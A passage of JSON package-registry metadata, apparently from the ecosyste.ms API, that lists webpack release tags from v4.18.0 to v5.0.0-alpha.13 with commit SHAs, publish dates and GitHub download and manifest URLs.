"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d